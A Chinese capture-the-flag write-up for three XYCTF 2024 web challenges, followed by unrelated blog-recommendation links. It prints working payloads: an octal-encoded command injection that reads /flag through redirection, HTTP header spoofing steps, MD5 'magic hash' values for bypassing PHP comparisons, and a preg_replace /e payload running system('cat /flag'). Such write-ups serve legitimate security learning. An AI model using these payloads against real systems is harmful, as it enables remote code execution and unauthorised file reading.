XYCTF 2024 web(1)

ezRCE

看源码,发现不是黑名单过滤,而是只能使用白名单的

就是说只能用0~9,\\,',$,<这几个字符

出现了<,很有可能是重定向

先是尝试了正常八进制的cat /flag,发现不行,那就是要重定向了

paylaod:?cmd='\\143\\141\\164'\<'\057\146\154\141\147'

ezhttp

这样说了,看看robots.txt

得到了用户名和密码

username: XYCTF

password: @JOILha!wuigqi123$

那要换一个referer

要换个User-Agent

要换个ip

不是xff,尝试一下其他的

client-IP

还要换代理

用via

饼干,那就是cookie

warm up

这是源码,就是基础的md5绕过

第一段是基础,不是数组就是科学计数法

第二段就是0e开头md5还是0e的

第三段,里面的md5()是0e开头,则XY和XYCTF一样就行了

payload:?val1=QNKCDZO&val2=240610708&md5=0e215962017&XY=PJNPDWY&XYCTF=PJNPDWY

第一个a,不能用数字,用数组过滤

第二个,用/e

payload:?a=/.*/e&b=system('cat /flag')&c=1

相关推荐
小羊没烦恼!4 天前
微服务化的基石——持续集成
java·大数据·word·powerpoint·.net
俊昭喜喜里4 天前
java中的继承和多态的区别
java
小羊没烦恼!4 天前
初探性能优化——2个月到4小时的性能提升
java·开发语言·windows·算法·c#
譕痕4 天前
JSONObject与JSONArray封装数据格式区别
java·json
虎头金猫4 天前
4K 视频总卡在公网带宽?用 N1 + OpenList 把网盘播放链路重新理顺
运维·服务器·网络·python·容器·beautifulsoup·pandas
胡写代码4 天前
别再前后端各写一套表单校验了
java·后端
小鱼能吃糖4 天前
缺陷修复总览 · mall电商项目:5类缺陷,1个病根,4个业务域
java·电商
此时不提桶,更待何时4 天前
01-06-A-JVM排查实战详解
java·jvm
伞伞悦读4 天前
【第38期】Python 模块与包详解:import、from、模块搜索路径、包结构和 __init__
开发语言·python
vipxieliang4 天前
ValidX 在 DDD 领域驱动设计中的实践
java·spring boot